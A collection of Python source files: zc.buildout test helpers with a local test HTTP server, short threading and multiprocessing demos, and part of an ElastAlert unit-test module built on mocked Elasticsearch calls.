import threading
import time
import zc.buildout.buildout
import zc.buildout.easy_install
from zc.buildout.rmtree import rmtree
print_ = zc.buildout.buildout.print_
fsync = getattr(os, 'fsync', lambda fileno: None)
is_win32 = sys.platform == 'win32'
def read(path='out', *rest):
with open(os.path.join(path, *rest)) as f:
return f.read()
def cat(dir, *names):
path = os.path.join(dir, *names)
if (not os.path.exists(path)
and is_win32
and os.path.exists(path+'-script.py')
):
path = path+'-script.py'
with open(path) as f:
print_(f.read(), end='')
def eqs(a, *b):
a = set(a); b = set(b)
return None if a == b else (a - b, b - a)
def clear_here():
for name in os.listdir('.'):
if os.path.isfile(name) or os.path.islink(name):
os.remove(name)
else:
shutil.rmtree(name)
def ls(dir, *subs):
if subs:
dir = os.path.join(dir, *subs)
names = sorted(os.listdir(dir))
for name in names:
# If we're running under coverage, elide coverage files
if os.getenv("COVERAGE_PROCESS_START") and name.startswith('.coverage.'):
continue
if os.path.isdir(os.path.join(dir, name)):
print_('d ', end=' ')
elif os.path.islink(os.path.join(dir, name)):
print_('l ', end=' ')
else:
print_('- ', end=' ')
print_(name)
def mkdir(*path):
os.mkdir(os.path.join(*path))
def remove(*path):
path = os.path.join(*path)
if os.path.isdir(path):
shutil.rmtree(path)
else:
os.remove(path)
def rmdir(*path):
shutil.rmtree(os.path.join(*path))
def write(dir, *args):
path = os.path.join(dir, *(args[:-1]))
f = open(path, 'w')
f.write(args[-1])
f.flush()
fsync(f.fileno())
f.close()
def clean_up_pyc(*path):
base, filename = os.path.join(*path[:-1]), path[-1]
if filename.endswith('.py'):
filename += 'c' # .py -> .pyc
for path in (
os.path.join(base, filename),
os.path.join(base, '__pycache__'),
):
if os.path.isdir(path):
rmdir(path)
elif os.path.exists(path):
remove(path)
## FIXME - check for other platforms
MUST_CLOSE_FDS = not sys.platform.startswith('win')
def system(command, input='', with_exit_code=False):
    # Some TERMinals, especially xterm and its variants, add invisible control
# characters, which we do not want as they mess up doctests. See:
# https://github.com/buildout/buildout/pull/311
# http://bugs.python.org/issue19884
env = dict(os.environ, TERM='dumb')
p = subprocess.Popen(command,
shell=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=MUST_CLOSE_FDS,
env=env)
i, o, e = (p.stdin, p.stdout, p.stderr)
if input:
i.write(input.encode())
i.close()
result = o.read() + e.read()
o.close()
e.close()
output = result.decode()
if with_exit_code:
# Use the with_exit_code=True parameter when you want to test the exit
# code of the command you're running.
output += 'EXIT CODE: %s' % p.wait()
p.wait()
return output
def get(url):
return str(urlopen(url).read().decode())
def _runsetup(setup, *args):
if os.path.isdir(setup):
setup = os.path.join(setup, 'setup.py')
args = list(args)
args.insert(0, '-q')
here = os.getcwd()
try:
os.chdir(os.path.dirname(setup))
zc.buildout.easy_install.call_subprocess(
[sys.executable, setup] + args,
env=dict(os.environ,
PYTHONPATH=zc.buildout.easy_install.setuptools_pythonpath,
),
)
if os.path.exists('build'):
rmtree('build')
finally:
os.chdir(here)
def sdist(setup, dest):
_runsetup(setup, 'sdist', '-d', dest, '--formats=zip')
def bdist_egg(setup, executable, dest=None):
# Backward compat:
if dest is None:
dest = executable
else:
assert executable == sys.executable, (executable, sys.executable)
_runsetup(setup, 'bdist_egg', '-d', dest)
def wait_until(label, func, *args, **kw):
if 'timeout' in kw:
kw = dict(kw)
timeout = kw.pop('timeout')
else:
timeout = 30
deadline = time.time()+timeout
while time.time() < deadline:
if func(*args, **kw):
return
time.sleep(0.01)
raise ValueError('Timed out waiting for: '+label)
class TestOptions(zc.buildout.buildout.Options):
def __init__(self, *args):
zc.buildout.buildout.Options.__init__(self, *args)
self._created = []
def initialize(self):
pass
class Buildout(zc.buildout.buildout.Buildout):
def __init__(self):
for name in 'eggs', 'parts':
if not os.path.exists(name):
os.mkdir(name)
zc.buildout.buildout.Buildout.__init__(
self, '', [('buildout', 'directory', os.getcwd())], False)
Options = TestOptions
def buildoutSetUp(test):
test.globs['__tear_downs'] = __tear_downs = []
test.globs['register_teardown'] = register_teardown = __tear_downs.append
prefer_final = zc.buildout.easy_install.prefer_final()
register_teardown(
lambda: zc.buildout.easy_install.prefer_final(prefer_final)
)
here = os.getcwd()
register_teardown(lambda: os.chdir(here))
handlers_before_set_up = logging.getLogger().handlers[:]
def restore_root_logger_handlers():
root_logger = logging.getLogger()
for handler in root_logger.handlers[:]:
root_logger.removeHandler(handler)
for handler in handlers_before_set_up:
root_logger.addHandler(handler)
bo_logger = logging.getLogger('zc.buildout')
for handler in bo_logger.handlers[:]:
bo_logger.removeHandler(handler)
register_teardown(restore_root_logger_handlers)
base = tempfile.mkdtemp('buildoutSetUp')
base = os.path.realpath(base)
register_teardown(lambda base=base: rmtree(base))
old_home = os.environ.get('HOME')
os.environ['HOME'] = os.path.join(base, 'bbbBadHome')
def restore_home():
if old_home is None:
del os.environ['HOME']
else:
os.environ['HOME'] = old_home
register_teardown(restore_home)
base = os.path.join(base, '_TEST_')
os.mkdir(base)
tmp = tempfile.mkdtemp('buildouttests')
register_teardown(lambda: rmtree(tmp))
zc.buildout.easy_install.default_index_url = 'file://'+tmp
os.environ['buildout-testing-index-url'] = (
zc.buildout.easy_install.default_index_url)
def tmpdir(name):
path = os.path.join(base, name)
mkdir(path)
return path
sample = tmpdir('sample-buildout')
os.chdir(sample)
# Create a basic buildout.cfg to avoid a warning from buildout:
with open('buildout.cfg', 'w') as f:
f.write("[buildout]\nparts =\n")
# Use the buildout bootstrap command to create a buildout
zc.buildout.buildout.Buildout(
'buildout.cfg',
[('buildout', 'log-level', 'WARNING'),
# trick bootstrap into putting the buildout develop egg
# in the eggs dir.
('buildout', 'develop-eggs-directory', 'eggs'),
]
).bootstrap([])
# Create the develop-eggs dir, which didn't get created the usual
# way due to the trick above:
os.mkdir('develop-eggs')
if os.getenv("COVERAGE_PROCESS_START"):
# The user has requested subprocess code coverage. Since we will be changing
# directories, we need to make sure this path is absolute, which means
# we need to temporarily return to our starting directory.
os.chdir(here)
path_to_coveragerc = os.path.abspath(os.environ['COVERAGE_PROCESS_START'])
os.chdir(sample)
assert os.path.isfile(path_to_coveragerc), path_to_coveragerc
os.environ['COVERAGE_PROCESS_START'] = path_to_coveragerc
# Before we return to the current directory and destroy the
# temporary working directory, we need to copy all the coverage files
# back so that they can be `coverage combine`d.
def copy_coverage_files():
coveragedir = os.path.dirname(path_to_coveragerc)
import glob
for f in glob.glob('.coverage*'):
shutil.copy(f, coveragedir)
__tear_downs.insert(0, copy_coverage_files)
# Now we must modify the newly created bin/buildout to
# actually begin coverage.
with open('bin/buildout') as f:
import textwrap
lines = f.read().splitlines()
assert lines[1] == '', lines
lines[1] = 'import coverage; coverage.process_startup()'
with open('bin/buildout', 'w') as f:
f.write('\n'.join(lines))
def start_server(path):
port, thread = _start_server(path, name=path)
url = 'http://localhost:%s/' % port
register_teardown(lambda: stop_server(url, thread))
return url
cdpaths = []
def cd(*path):
path = os.path.join(*path)
cdpaths.append(os.path.abspath(os.getcwd()))
os.chdir(path)
def uncd():
os.chdir(cdpaths.pop())
test.globs.update(dict(
sample_buildout = sample,
ls = ls,
cat = cat,
mkdir = mkdir,
rmdir = rmdir,
remove = remove,
tmpdir = tmpdir,
write = write,
system = system,
get = get,
cd = cd, uncd = uncd,
join = os.path.join,
sdist = sdist,
bdist_egg = bdist_egg,
start_server = start_server,
stop_server = stop_server,
buildout = os.path.join(sample, 'bin', 'buildout'),
wait_until = wait_until,
print_ = print_,
clean_up_pyc = clean_up_pyc,
))
zc.buildout.easy_install.prefer_final(prefer_final)
def buildoutTearDown(test):
for f in test.globs['__tear_downs']:
f()
class Server(HTTPServer):
def __init__(self, tree, *args):
HTTPServer.__init__(self, *args)
self.tree = os.path.abspath(tree)
__run = True
def serve_forever(self):
while self.__run:
self.handle_request()
def handle_error(self, *_):
self.__run = False
class Handler(BaseHTTPRequestHandler):
Server.__log = False
def __init__(self, request, address, server):
self.__server = server
self.tree = server.tree
BaseHTTPRequestHandler.__init__(self, request, address, server)
def do_GET(self):
if '__stop__' in self.path:
self.__server.server_close()
raise SystemExit
def k():
self.send_response(200)
out = '<html><body>k</body></html>\n'.encode()
self.send_header('Content-Length', str(len(out)))
self.send_header('Content-Type', 'text/html')
self.end_headers()
self.wfile.write(out)
if self.path == '/enable_server_logging':
self.__server.__log = True
return k()
if self.path == '/disable_server_logging':
self.__server.__log = False
return k()
path = os.path.abspath(os.path.join(self.tree, *self.path.split('/')))
if not (
((path == self.tree) or path.startswith(self.tree+os.path.sep))
and
os.path.exists(path)
):
self.send_response(404, 'Not Found')
#self.send_response(200)
out = '<html><body>Not Found</body></html>'.encode()
#out = '\n'.join(self.tree, self.path, path)
self.send_header('Content-Length', str(len(out)))
self.send_header('Content-Type', 'text/html')
self.end_headers()
self.wfile.write(out)
return
self.send_response(200)
if os.path.isdir(path):
out = ['<html><body>\n']
names = sorted(os.listdir(path))
for name in names:
if os.path.isdir(os.path.join(path, name)):
name += '/'
out.append('<a href="%s">%s</a><br>\n' % (name, name))
out.append('</body></html>\n')
out = ''.join(out).encode()
self.send_header('Content-Length', str(len(out)))
self.send_header('Content-Type', 'text/html')
else:
with open(path, 'rb') as f:
out = f.read()
self.send_header('Content-Length', len(out))
if path.endswith('.egg'):
self.send_header('Content-Type', 'application/zip')
elif path.endswith('.gz'):
self.send_header('Content-Type', 'application/x-gzip')
elif path.endswith('.zip'):
self.send_header('Content-Type', 'application/x-gzip')
else:
self.send_header('Content-Type', 'text/html')
self.end_headers()
self.wfile.write(out)
def log_request(self, code):
if self.__server.__log:
print_('%s %s %s' % (self.command, code, self.path))
def _run(tree, port):
server_address = ('localhost', port)
httpd = Server(tree, server_address, Handler)
httpd.serve_forever()
httpd.server_close()
def get_port():
for i in range(10):
port = random.randrange(20000, 30000)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
try:
s.connect(('localhost', port))
except socket.error:
return port
finally:
s.close()
raise RuntimeError("Can't find port")
def _start_server(tree, name=''):
port = get_port()
thread = threading.Thread(target=_run, args=(tree, port), name=name)
thread.setDaemon(True)
thread.start()
wait(port, up=True)
return port, thread
def start_server(tree):
return _start_server(tree)[0]
def stop_server(url, thread=None):
try:
urlopen(url+'__stop__')
except Exception:
pass
if thread is not None:
thread.join() # wait for thread to stop
def wait(port, up):
addr = 'localhost', port
for i in range(120):
time.sleep(0.25)
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(addr)
s.close()
if up:
break
except socket.error:
e = sys.exc_info()[1]
if e[0] not in (errno.ECONNREFUSED, errno.ECONNRESET):
raise
s.close()
if not up:
break
else:
if up:
raise
else:
raise SystemError("Couldn't stop server")
def install(project, destination):
if not isinstance(destination, str):
destination = os.path.join(destination.globs['sample_buildout'],
'eggs')
dist = pkg_resources.working_set.find(
pkg_resources.Requirement.parse(project))
if dist.location.endswith('.egg'):
destination = os.path.join(destination,
os.path.basename(dist.location),
)
if os.path.isdir(dist.location):
shutil.copytree(dist.location, destination)
else:
shutil.copyfile(dist.location, destination)
else:
# copy link
with open(os.path.join(destination, project+'.egg-link'), 'w') as f:
f.write(dist.location)
def install_develop(project, destination):
if not isinstance(destination, str):
destination = os.path.join(destination.globs['sample_buildout'],
'develop-eggs')
dist = pkg_resources.working_set.find(
pkg_resources.Requirement.parse(project))
with open(os.path.join(destination, project+'.egg-link'), 'w') as f:
f.write(dist.location)
def _normalize_path(match):
path = match.group(1)
if os.path.sep == '\\':
path = path.replace('\\\\', '/')
if path.startswith('\\'):
path = path[1:]
return '/' + path.replace(os.path.sep, '/')
normalize_path = (
re.compile(
r'''[^'" \t\n\r]+\%(sep)s_[Tt][Ee][Ss][Tt]_\%(sep)s([^"' \t\n\r]+)'''
% dict(sep=os.path.sep)),
_normalize_path,
)
normalize_endings = re.compile('\r\n'), '\n'
normalize_script = (
re.compile('(\n?)- ([a-zA-Z_.-]+)-script.py\n- \\2.exe\n'),
'\\1- \\2\n')
if sys.version_info > (2, ):
normalize___pycache__ = (
re.compile('(\n?)d __pycache__\n'), '\\1')
else:
normalize___pycache__ = (
re.compile(r'(\n?)- \S+\.pyc\n'), '\\1')
normalize_egg_py = (
re.compile(r'-py\d[.]\d(-\S+)?.egg'),
'-pyN.N.egg',
)
normalize_exception_type_for_python_2_and_3 = (
re.compile(r'^(\w+\.)*([A-Z][A-Za-z0-9]+Error: )'),
'\2')
normalize_open_in_generated_script = (
re.compile(r"open\(__file__, 'U'\)"), 'open(__file__)')
not_found = (re.compile(r'Not found: [^\n]+/(\w|\.)+/\r?\n'), '')
# Setuptools now pulls in dependencies when installed.
adding_find_link = (re.compile(r"Adding find link '[^']+'"
r" from setuptools .*\r?\n"), '')
ignore_not_upgrading = (
re.compile(
'Not upgrading because not running a local buildout command.\n'
), '')
def run_buildout(command):
    # Make sure we don't pick up the user's ~/.buildout default configuration
os.environ['HOME'] = os.path.join(os.getcwd(), 'home')
args = command.split()
import pkg_resources
buildout = pkg_resources.load_entry_point(
'zc.buildout', 'console_scripts', args[0])
buildout(args[1:])
def run_from_process(target, *args, **kw):
sys.stdout = sys.stderr = open('out', 'w')
target(*args, **kw)
def run_in_process(*args, **kwargs):
process = Process(target=run_from_process, args=args, kwargs=kwargs)
process.daemon = True
process.start()
process.join(99)
if process.is_alive() or process.exitcode:
with open('out') as f:
print(f.read())
def run_buildout_in_process(command='buildout'):
command = command.split(' ', 1)
command.insert(
1,
" use-dependency-links=false"
# Leaving this here so we can uncomment to see what's going on.
#" log-format=%(asctime)s____%(levelname)s_%(message)s -vvv"
" index=" + __file__ + 'nonexistent' # hide index
)
command = ' '.join(command)
run_in_process(run_buildout, command)
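# Hypothetical usage sketch (not part of zc.buildout itself): the
# buildoutSetUp/buildoutTearDown pair above is typically wired into a
# doctest-based suite roughly like this. The file name 'example.txt' is made
# up; real suites also pass renormalizing checkers built from the normalize_*
# patterns defined above. The function is defined here but never called.
def _example_test_suite():
    import doctest
    return doctest.DocFileSuite(
        'example.txt',
        setUp=buildoutSetUp,
        tearDown=buildoutTearDown,
    )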
|
daemon_thread_with_join.py
|
import logging
import threading
import time
def thread_function(name):
logging.info(f'Thread {name}: starting')
time.sleep(2)
logging.info(f'Thread {name}: finishing')
if __name__ == "__main__":
format = "%(asctime)s: %(message)s"
logging.basicConfig(format=format, level=logging.INFO, datefmt='%H:%M:%S')
logging.info('Main : before creating thread')
    # Pass the argument data as a tuple: (1, )
x = threading.Thread(target=thread_function, args=(1, ), daemon=True)
logging.info('Main : before running thread')
x.start()
logging.info('Main : wait for the thread to finish')
x.join()
logging.info('Main : all done')
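# A hedged variant sketch (not part of the demo above, and not executed):
# with daemon=True and a join() timeout, the main thread stops waiting after
# the timeout and the daemon thread is killed when the interpreter exits, so
# its "finishing" log line may never appear.
def demo_join_with_timeout():
    t = threading.Thread(target=thread_function, args=(2,), daemon=True)
    t.start()
    t.join(timeout=0.5)  # give up waiting after 0.5 seconds
    logging.info('Main : gave up waiting; thread alive=%s', t.is_alive())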
|
01_demo.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from multiprocessing import Process
import time
import os
def run_proc(name, age, **kwargs):
"""⼦进程要执⾏的代码"""
for i in range(10):
        print('Child process running, name=%s, age=%d, pid=%d...' % (name, age, os.getpid()))
print(kwargs)
time.sleep(0.2)
    print('Child process is about to finish...')
if __name__ == "__main__":
    print('Parent process pid: %d' % os.getpid())  # os.getpid() returns the current process ID
p = Process(target=run_proc, args=("test", 18), kwargs={"m":20})
p.start()
time.sleep(1)
p.terminate()
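# A hedged follow-up sketch (defined but not executed above): after
# terminate(), joining the child and inspecting exitcode shows how it ended;
# on Unix a negative exitcode means the process was killed by that signal
# number (e.g. -15 for SIGTERM).
def check_child_after_terminate(p):
    p.join()  # wait for the terminated child to be reaped
    print('child alive: %s, exitcode: %s' % (p.is_alive(), p.exitcode))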
|
base_test.py
|
# -*- coding: utf-8 -*-
import contextlib
import copy
import datetime
import json
import threading
import elasticsearch
import mock
import pytest
from elasticsearch.exceptions import ConnectionError
from elasticsearch.exceptions import ElasticsearchException
from elastalert.enhancements import BaseEnhancement
from elastalert.enhancements import DropMatchException
from elastalert.kibana import dashboard_temp
from elastalert.util import dt_to_ts
from elastalert.util import dt_to_unix
from elastalert.util import dt_to_unixms
from elastalert.util import EAException
from elastalert.util import ts_now
from elastalert.util import ts_to_dt
from elastalert.util import unix_to_dt
START_TIMESTAMP = '2014-09-26T12:34:45Z'
END_TIMESTAMP = '2014-09-27T12:34:45Z'
START = ts_to_dt(START_TIMESTAMP)
END = ts_to_dt(END_TIMESTAMP)
def _set_hits(ea_inst, hits):
res = {'hits': {'total': len(hits), 'hits': hits}}
ea_inst.client_es.return_value = res
def generate_hits(timestamps, **kwargs):
hits = []
for i, ts in enumerate(timestamps):
data = {'_id': 'id{}'.format(i),
'_source': {'@timestamp': ts},
'_type': 'logs',
'_index': 'idx'}
for key, item in kwargs.items():
data['_source'][key] = item
# emulate process_hits(), add metadata to _source
for field in ['_id', '_type', '_index']:
data['_source'][field] = data[field]
hits.append(data)
return {'hits': {'total': len(hits), 'hits': hits}}
def assert_alerts(ea_inst, calls):
""" Takes a list of lists of timestamps. Asserts that an alert was called for each list, containing those timestamps. """
assert ea_inst.rules[0]['alert'][0].alert.call_count == len(calls)
for call_num, call_args in enumerate(ea_inst.rules[0]['alert'][0].alert.call_args_list):
assert not any([match['@timestamp'] not in calls[call_num] for match in call_args[0][0]])
assert len(call_args[0][0]) == len(calls[call_num])
def test_starttime(ea):
invalid = ['2014-13-13',
'2014-11-24T30:00:00',
'Not A Timestamp']
for ts in invalid:
with pytest.raises((TypeError, ValueError)):
ts_to_dt(ts)
def test_init_rule(ea):
# Simulate state of a rule just loaded from a file
ea.rules[0]['minimum_starttime'] = datetime.datetime.now()
new_rule = copy.copy(ea.rules[0])
map(new_rule.pop, ['agg_matches', 'current_aggregate_id', 'processed_hits', 'minimum_starttime'])
# Properties are copied from ea.rules[0]
ea.rules[0]['starttime'] = '2014-01-02T00:11:22'
ea.rules[0]['processed_hits'] = ['abcdefg']
new_rule = ea.init_rule(new_rule, False)
for prop in ['starttime', 'agg_matches', 'current_aggregate_id', 'processed_hits', 'minimum_starttime']:
assert new_rule[prop] == ea.rules[0][prop]
# Properties are fresh
new_rule = ea.init_rule(new_rule, True)
new_rule.pop('starttime')
assert 'starttime' not in new_rule
assert new_rule['processed_hits'] == {}
def test_query(ea):
ea.current_es.search.return_value = {'hits': {'total': 0, 'hits': []}}
ea.run_query(ea.rules[0], START, END)
ea.current_es.search.assert_called_with(body={
'query': {'filtered': {'filter': {'bool': {'must': [{'range': {'@timestamp': {'lte': END_TIMESTAMP, 'gt': START_TIMESTAMP}}}]}}}},
'sort': [{'@timestamp': {'order': 'asc'}}]}, index='idx', _source_include=['@timestamp'], ignore_unavailable=True,
size=ea.rules[0]['max_query_size'], scroll=ea.conf['scroll_keepalive'])
def test_query_with_fields(ea):
ea.rules[0]['_source_enabled'] = False
ea.current_es.search.return_value = {'hits': {'total': 0, 'hits': []}}
ea.run_query(ea.rules[0], START, END)
ea.current_es.search.assert_called_with(body={
'query': {'filtered': {'filter': {'bool': {'must': [{'range': {'@timestamp': {'lte': END_TIMESTAMP, 'gt': START_TIMESTAMP}}}]}}}},
'sort': [{'@timestamp': {'order': 'asc'}}], 'fields': ['@timestamp']}, index='idx', ignore_unavailable=True,
size=ea.rules[0]['max_query_size'], scroll=ea.conf['scroll_keepalive'])
def test_query_with_unix(ea):
ea.rules[0]['timestamp_type'] = 'unix'
ea.rules[0]['dt_to_ts'] = dt_to_unix
ea.current_es.search.return_value = {'hits': {'total': 0, 'hits': []}}
ea.run_query(ea.rules[0], START, END)
start_unix = dt_to_unix(START)
end_unix = dt_to_unix(END)
ea.current_es.search.assert_called_with(
body={'query': {'filtered': {'filter': {'bool': {'must': [{'range': {'@timestamp': {'lte': end_unix, 'gt': start_unix}}}]}}}},
'sort': [{'@timestamp': {'order': 'asc'}}]}, index='idx', _source_include=['@timestamp'], ignore_unavailable=True,
size=ea.rules[0]['max_query_size'], scroll=ea.conf['scroll_keepalive'])
def test_query_with_unixms(ea):
ea.rules[0]['timestamp_type'] = 'unixms'
ea.rules[0]['dt_to_ts'] = dt_to_unixms
ea.current_es.search.return_value = {'hits': {'total': 0, 'hits': []}}
ea.run_query(ea.rules[0], START, END)
start_unix = dt_to_unixms(START)
end_unix = dt_to_unixms(END)
ea.current_es.search.assert_called_with(
body={'query': {'filtered': {'filter': {'bool': {'must': [{'range': {'@timestamp': {'lte': end_unix, 'gt': start_unix}}}]}}}},
'sort': [{'@timestamp': {'order': 'asc'}}]}, index='idx', _source_include=['@timestamp'], ignore_unavailable=True,
size=ea.rules[0]['max_query_size'], scroll=ea.conf['scroll_keepalive'])
def test_no_hits(ea):
ea.current_es.search.return_value = {'hits': {'total': 0, 'hits': []}}
ea.run_query(ea.rules[0], START, END)
assert ea.rules[0]['type'].add_data.call_count == 0
def test_no_terms_hits(ea):
ea.rules[0]['use_terms_query'] = True
ea.rules[0]['query_key'] = 'QWERTY'
ea.rules[0]['doc_type'] = 'uiop'
ea.current_es.search.return_value = {'hits': {'total': 0, 'hits': []}}
ea.run_query(ea.rules[0], START, END)
assert ea.rules[0]['type'].add_terms_data.call_count == 0
def test_some_hits(ea):
hits = generate_hits([START_TIMESTAMP, END_TIMESTAMP])
hits_dt = generate_hits([START, END])
ea.current_es.search.return_value = hits
ea.run_query(ea.rules[0], START, END)
assert ea.rules[0]['type'].add_data.call_count == 1
ea.rules[0]['type'].add_data.assert_called_with([x['_source'] for x in hits_dt['hits']['hits']])
def test_some_hits_unix(ea):
ea.rules[0]['timestamp_type'] = 'unix'
ea.rules[0]['dt_to_ts'] = dt_to_unix
ea.rules[0]['ts_to_dt'] = unix_to_dt
hits = generate_hits([dt_to_unix(START), dt_to_unix(END)])
hits_dt = generate_hits([START, END])
ea.current_es.search.return_value = copy.deepcopy(hits)
ea.run_query(ea.rules[0], START, END)
assert ea.rules[0]['type'].add_data.call_count == 1
ea.rules[0]['type'].add_data.assert_called_with([x['_source'] for x in hits_dt['hits']['hits']])
def _duplicate_hits_generator(timestamps, **kwargs):
"""Generator repeatedly returns identical hits dictionaries
"""
while True:
yield generate_hits(timestamps, **kwargs)
def test_duplicate_timestamps(ea):
ea.current_es.search.side_effect = _duplicate_hits_generator([START_TIMESTAMP] * 3, blah='duplicate')
ea.run_query(ea.rules[0], START, ts_to_dt('2014-01-01T00:00:00Z'))
assert len(ea.rules[0]['type'].add_data.call_args_list[0][0][0]) == 3
assert ea.rules[0]['type'].add_data.call_count == 1
# Run the query again, duplicates will be removed and not added
ea.run_query(ea.rules[0], ts_to_dt('2014-01-01T00:00:00Z'), END)
assert ea.rules[0]['type'].add_data.call_count == 1
def test_match(ea):
hits = generate_hits([START_TIMESTAMP, END_TIMESTAMP])
ea.current_es.search.return_value = hits
ea.rules[0]['type'].matches = [{'@timestamp': END}]
with mock.patch('elastalert.elastalert.elasticsearch_client'):
ea.run_rule(ea.rules[0], END, START)
ea.rules[0]['alert'][0].alert.called_with({'@timestamp': END_TIMESTAMP})
assert ea.rules[0]['alert'][0].alert.call_count == 1
def test_run_rule_calls_garbage_collect(ea):
start_time = '2014-09-26T00:00:00Z'
end_time = '2014-09-26T12:00:00Z'
ea.buffer_time = datetime.timedelta(hours=1)
ea.run_every = datetime.timedelta(hours=1)
with contextlib.nested(mock.patch.object(ea.rules[0]['type'], 'garbage_collect'),
mock.patch.object(ea, 'run_query')) as (mock_gc, mock_get_hits):
ea.run_rule(ea.rules[0], ts_to_dt(end_time), ts_to_dt(start_time))
# Running ElastAlert every hour for 12 hours, we should see self.garbage_collect called 12 times.
assert mock_gc.call_count == 12
# The calls should be spaced 1 hour apart
expected_calls = [ts_to_dt(start_time) + datetime.timedelta(hours=i) for i in range(1, 13)]
for e in expected_calls:
mock_gc.assert_any_call(e)
def run_rule_query_exception(ea, mock_es):
with mock.patch('elastalert.elastalert.elasticsearch_client') as mock_es_init:
mock_es_init.return_value = mock_es
ea.run_rule(ea.rules[0], END, START)
# Assert neither add_data nor garbage_collect were called
# and that starttime did not change
assert ea.rules[0].get('starttime') == START
assert ea.rules[0]['type'].add_data.call_count == 0
assert ea.rules[0]['type'].garbage_collect.call_count == 0
assert ea.rules[0]['type'].add_count_data.call_count == 0
def test_query_exception(ea):
mock_es = mock.Mock()
mock_es.search.side_effect = ElasticsearchException
run_rule_query_exception(ea, mock_es)
def test_query_exception_count_query(ea):
ea.rules[0]['use_count_query'] = True
ea.rules[0]['doc_type'] = 'blahblahblahblah'
mock_es = mock.Mock()
mock_es.count.side_effect = ElasticsearchException
run_rule_query_exception(ea, mock_es)
def test_match_with_module(ea):
mod = BaseEnhancement(ea.rules[0])
mod.process = mock.Mock()
ea.rules[0]['match_enhancements'] = [mod]
test_match(ea)
mod.process.assert_called_with({'@timestamp': END, 'num_hits': 0, 'num_matches': 1})
def test_match_with_module_from_pending(ea):
mod = BaseEnhancement(ea.rules[0])
mod.process = mock.Mock()
ea.rules[0]['match_enhancements'] = [mod]
ea.rules[0].pop('aggregation')
pending_alert = {'match_body': {'foo': 'bar'}, 'rule_name': ea.rules[0]['name'],
'alert_time': START_TIMESTAMP, '@timestamp': START_TIMESTAMP}
    # First call returns the pending alert; the second returns no associated aggregated alerts
ea.writeback_es.search.side_effect = [{'hits': {'hits': [{'_id': 'ABCD', '_source': pending_alert}]}},
{'hits': {'hits': []}}]
ea.send_pending_alerts()
assert mod.process.call_count == 0
# If aggregation is set, enhancement IS called
pending_alert = {'match_body': {'foo': 'bar'}, 'rule_name': ea.rules[0]['name'],
'alert_time': START_TIMESTAMP, '@timestamp': START_TIMESTAMP}
ea.writeback_es.search.side_effect = [{'hits': {'hits': [{'_id': 'ABCD', '_source': pending_alert}]}},
{'hits': {'hits': []}}]
ea.rules[0]['aggregation'] = datetime.timedelta(minutes=10)
ea.send_pending_alerts()
assert mod.process.call_count == 1
def test_match_with_module_with_agg(ea):
mod = BaseEnhancement(ea.rules[0])
mod.process = mock.Mock()
ea.rules[0]['match_enhancements'] = [mod]
ea.rules[0]['aggregation'] = datetime.timedelta(minutes=15)
hits = generate_hits([START_TIMESTAMP, END_TIMESTAMP])
ea.current_es.search.return_value = hits
ea.rules[0]['type'].matches = [{'@timestamp': END}]
with mock.patch('elastalert.elastalert.elasticsearch_client'):
ea.run_rule(ea.rules[0], END, START)
assert mod.process.call_count == 0
def test_match_with_enhancements_first(ea):
mod = BaseEnhancement(ea.rules[0])
mod.process = mock.Mock()
ea.rules[0]['match_enhancements'] = [mod]
ea.rules[0]['aggregation'] = datetime.timedelta(minutes=15)
ea.rules[0]['run_enhancements_first'] = True
hits = generate_hits([START_TIMESTAMP, END_TIMESTAMP])
ea.current_es.search.return_value = hits
ea.rules[0]['type'].matches = [{'@timestamp': END}]
with mock.patch('elastalert.elastalert.elasticsearch_client'):
with mock.patch.object(ea, 'add_aggregated_alert') as add_alert:
ea.run_rule(ea.rules[0], END, START)
mod.process.assert_called_with({'@timestamp': END, 'num_hits': 0, 'num_matches': 1})
assert add_alert.call_count == 1
# Assert that dropmatchexception behaves properly
mod.process = mock.MagicMock(side_effect=DropMatchException)
ea.rules[0]['type'].matches = [{'@timestamp': END}]
with mock.patch('elastalert.elastalert.elasticsearch_client'):
with mock.patch.object(ea, 'add_aggregated_alert') as add_alert:
ea.run_rule(ea.rules[0], END, START)
mod.process.assert_called_with({'@timestamp': END, 'num_hits': 0, 'num_matches': 1})
assert add_alert.call_count == 0
def test_agg_matchtime(ea):
ea.max_aggregation = 1337
hits_timestamps = ['2014-09-26T12:34:45', '2014-09-26T12:40:45', '2014-09-26T12:47:45']
alerttime1 = dt_to_ts(ts_to_dt(hits_timestamps[0]) + datetime.timedelta(minutes=10))
hits = generate_hits(hits_timestamps)
ea.current_es.search.return_value = hits
with mock.patch('elastalert.elastalert.elasticsearch_client'):
# Aggregate first two, query over full range
ea.rules[0]['aggregate_by_match_time'] = True
ea.rules[0]['aggregation'] = datetime.timedelta(minutes=10)
ea.rules[0]['type'].matches = [{'@timestamp': h} for h in hits_timestamps]
ea.run_rule(ea.rules[0], END, START)
# Assert that the three matches were added to Elasticsearch
call1 = ea.writeback_es.index.call_args_list[0][1]['body']
call2 = ea.writeback_es.index.call_args_list[1][1]['body']
call3 = ea.writeback_es.index.call_args_list[2][1]['body']
assert call1['match_body']['@timestamp'] == '2014-09-26T12:34:45'
assert not call1['alert_sent']
assert 'aggregate_id' not in call1
assert call1['alert_time'] == alerttime1
assert call2['match_body']['@timestamp'] == '2014-09-26T12:40:45'
assert not call2['alert_sent']
assert call2['aggregate_id'] == 'ABCD'
assert call3['match_body']['@timestamp'] == '2014-09-26T12:47:45'
assert not call3['alert_sent']
assert 'aggregate_id' not in call3
# First call - Find all pending alerts (only entries without agg_id)
# Second call - Find matches with agg_id == 'ABCD'
# Third call - Find matches with agg_id == 'CDEF'
ea.writeback_es.search.side_effect = [{'hits': {'hits': [{'_id': 'ABCD', '_source': call1},
{'_id': 'CDEF', '_source': call3}]}},
{'hits': {'hits': [{'_id': 'BCDE', '_source': call2}]}},
{'hits': {'total': 0, 'hits': []}}]
with mock.patch('elastalert.elastalert.elasticsearch_client') as mock_es:
ea.send_pending_alerts()
# Assert that current_es was refreshed from the aggregate rules
assert mock_es.called_with(host='', port='')
assert mock_es.call_count == 2
assert_alerts(ea, [hits_timestamps[:2], hits_timestamps[2:]])
call1 = ea.writeback_es.search.call_args_list[7][1]['body']
call2 = ea.writeback_es.search.call_args_list[8][1]['body']
call3 = ea.writeback_es.search.call_args_list[9][1]['body']
call4 = ea.writeback_es.search.call_args_list[10][1]['body']
